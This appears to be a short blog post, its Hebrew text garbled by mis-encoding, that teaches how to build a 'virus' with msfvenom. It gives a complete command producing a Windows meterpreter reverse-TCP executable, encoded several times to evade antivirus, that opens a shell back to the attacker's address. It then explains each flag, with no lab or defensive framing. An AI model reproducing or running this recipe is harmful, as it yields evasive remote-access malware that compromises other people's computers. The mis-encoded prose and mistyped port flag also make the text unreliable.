top of page

ืื™ืš ืžื™ืฆืจื™ื ื•ื™ืจื•ืก ืื msfvenom

ืขื•ื“ื›ืŸ: 31 ื‘ื™ื•ืœื™ 2020



ื›ื“ื™ ืœื™ืฆืจ ื•ื™ืจื•ืก (payload) ืฆืจื™ืš ืœื”ืฉืชืžืฉ ื‘msfvenom

ืžื” ื–ื” msfvenom:

ื”ื•ื ืฉื™ืœื•ื‘ ืฉืœ ืฉื ื™ ื›ืœื™ื ื™ืฉื ื™ื: msfpayload ื• msfencode ืฉืฉื™ืžืฉื• ื‘ืขื‘ืจ ื›ื“ื™ ืœื™ืฆืจ payload

1.ื›ื“ื™ ืœื”ืฉืชืžืฉ ื‘msfvenom ื ื›ื ื™ืก ืœkali linux ื›ืืŸ ืงื™ืฉื•ืจ ื›ื“ื™ ืœื”ื•ืจื™ื“

ืคื•ืชื—ื™ื terminal ื•ืจื•ืฉืžื™ื

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 -LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o ~/Desktop/virus.exe
-a = ื‘64 ืื• 32 ื‘ื™ื˜ 
--platform = ื‘ืื™ื–ื” ืžืขืจื›ืช ื”ืคืœื” ืืชื ืจื•ืฆื™ื ืฉื™ืจื•ืฅ
-p =ืื™ื–ื” payload ืืชื ืจื•ืฆื™ื ืœื”ืฉืชืžืฉ 
-e= ื‘ืื™ื–ื” encoder ืืชื ืจื•ืฆื™ื ืœื”ืฉืžืฉ 
-i = ื‘ื›ืžื” ืคืขืžื™ื ืืชื ืจื•ืฆื™ื ืœืขืฉื•ืช encode 
-o = ืื™ืคื” ืืชื ืจื•ืฆื™ื ืฉื™ื”ื™ื” ื”ื•ื™ืจื•ืก ืฉืœื›ื 
lhost =  ืฉืœื›ื IPื”ื›ืชื•ื‘ืช ื” 
lport= ื‘ืื™ื–ื” ืคื•ืจื˜ ืืชื ืจื•ืฆื™ื ืœืคืชื•ื— ืื–ื ื” 
ื›ื“ื™ ืœื“ืขืช ืงืฆืช ื™ื•ืชืจ ืขืœ msfvenom ื•ื”ืืคืฉืจื™ื•ืช ืฉื™ืฉ 

ื›ื“ื™ ืœื“ืขืช ื‘ืื™ื–ื” payload ืืชื ืจื•ืฆื™ื ืœื”ืฉืชืžืฉ msfconsole ื• search payload ื›ืืŸ ื™ืฉ ืœื›ื ืืช ื›ืžื•ืช ื”payload ืฉืชื•ื›ืœื• ืœื”ืฉืชืžืฉ








ืœื™ืฆื™ืจืช ืงืฉืจ ื•ืฉื™ืจื•ืช ื˜ื›ื ืื™ ืžื—ืฉื‘ื™ื ื‘ื™ืจื•ืฉืœื™ื ืขื“ ื”ื‘ื™ืช ื—ื™ื™ื’ื• โ€“ 0532104457

141 ืฆืคื™ื•ืช0 ืชื’ื•ื‘ื•ืช

ืคื•ืกื˜ื™ื ืื—ืจื•ื ื™ื

ื”ืฆื’ ื”ื›ื•ืœ
bottom of page